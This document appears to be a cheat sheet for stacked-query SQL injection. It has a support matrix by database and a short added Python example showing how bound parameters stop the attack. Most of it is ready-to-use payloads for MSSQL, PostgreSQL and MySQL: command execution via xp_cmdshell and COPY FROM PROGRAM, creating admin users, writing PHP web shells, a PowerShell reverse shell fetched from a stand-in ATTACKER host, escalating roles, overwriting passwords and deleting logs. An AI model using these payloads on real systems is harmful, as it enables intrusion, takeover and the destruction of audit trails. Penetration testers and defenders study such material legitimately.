Overview

Stacked queries execute multiple SQL statements, separated by ;, in a single injection. Unlike UNION-based or error-based injection, stacked queries can run INSERT, UPDATE, DELETE, and administrative commands. Not all databases and drivers support this.

Support Matrix

| Database | Supported | Notes |
|---|---|---|
| MSSQL | Yes | Full support |
| PostgreSQL | Yes | Full support |
| MySQL | Depends | Only with mysqli_multi_query() or PDO with ATTR_EMULATE_PREPARES |
| SQLite | Yes | Via some drivers |
| Oracle | No | Not supported |
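
The driver dependence in the support matrix, shown from the defender's side with Python's built-in sqlite3 module. This is an added example, not code from the original page; the table contents and function names are constructed for illustration, and the input is modeled on the page's "Update Data" payload.

```python
import sqlite3

# Constructed input, modeled on the page's "Update Data" payload.
PAYLOAD = "x'; UPDATE users SET role='admin' WHERE username='hacker';-- -"

def fresh_db():
    """In-memory database holding one low-privilege account (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.execute("INSERT INTO users VALUES ('hacker', 'pass123', 'user')")
    db.commit()
    return db

def role_of(db, username):
    row = db.execute("SELECT role FROM users WHERE username = ?", (username,)).fetchone()
    return row[0]

def lookup_multi(db, name):
    """Vulnerable: concatenated input sent through a multi-statement API."""
    db.executescript("SELECT * FROM users WHERE username = '" + name + "'")
    return "executed"

def lookup_single(db, name):
    """Concatenated input, but execute() accepts exactly one statement."""
    try:
        db.execute("SELECT * FROM users WHERE username = '" + name + "'")
        return "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # Raised before anything runs; the exception class depends on the Python version.
        return "rejected"

def lookup_bound(db, name):
    """Hardened: the input is bound as a value and never parsed as SQL."""
    db.execute("SELECT * FROM users WHERE username = ?", (name,)).fetchall()
    return "executed"

def run_all():
    """Return {api: (outcome, role of 'hacker' afterwards)} for each lookup style."""
    results = {}
    for label, lookup in (("executescript", lookup_multi),
                          ("execute", lookup_single),
                          ("bound parameter", lookup_bound)):
        db = fresh_db()
        outcome = lookup(db, PAYLOAD)
        results[label] = (outcome, role_of(db, "hacker"))
        db.close()
    return results

if __name__ == "__main__":
    for label, result in run_all().items():
        print(f"{label:16} {result}")
```

A single-statement API only removes stacking: the concatenated query in lookup_single is still injectable by other techniques, so bound parameters are the fix.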

MSSQL

Execute Commands

'; EXEC xp_cmdshell 'whoami'-- -

Enable xp_cmdshell

'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -

Create Admin User

'; EXEC('net user hacker Password123! /add'); EXEC('net localgroup administrators hacker /add')-- -

Reverse Shell

'; EXEC xp_cmdshell 'powershell -c "iex(iwr http://ATTACKER/shell.ps1)"'-- -

PostgreSQL

Command Execution

'; CREATE TABLE cmd(output text); COPY cmd FROM PROGRAM 'id';-- -

Create User

'; CREATE USER hacker WITH PASSWORD 'pass123' SUPERUSER;-- -

File Write

'; COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';-- -

MySQL

Write File

'; SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';-- -

Create User

'; CREATE USER 'hacker'@'%' IDENTIFIED BY 'pass123'; GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%';-- -

Data Manipulation

Insert Data

'; INSERT INTO users (username,password,role) VALUES ('hacker','pass123','admin');-- -

Update Data

'; UPDATE users SET role='admin' WHERE username='hacker';-- -
'; UPDATE users SET password='newpass' WHERE username='admin';-- -

Delete Data

'; DELETE FROM logs WHERE 1=1;-- -

Detection

If the second query executes, the response is delayed by about five seconds, which shows that stacked queries work:
'; SELECT SLEEP(5);-- -             # MySQL
'; WAITFOR DELAY '0:0:5';-- -      # MSSQL
'; SELECT pg_sleep(5);-- -         # PostgreSQL

Quick Reference

| Technique | Payload |
|---|---|
| MSSQL RCE | '; EXEC xp_cmdshell 'whoami'-- - |
| PostgreSQL RCE | '; COPY cmd FROM PROGRAM 'id'-- - |
| MySQL write | '; SELECT ... INTO OUTFILE '/path'-- - |
| Insert user | '; INSERT INTO users VALUES(...)-- - |
| Update role | '; UPDATE users SET role='admin'-- - |
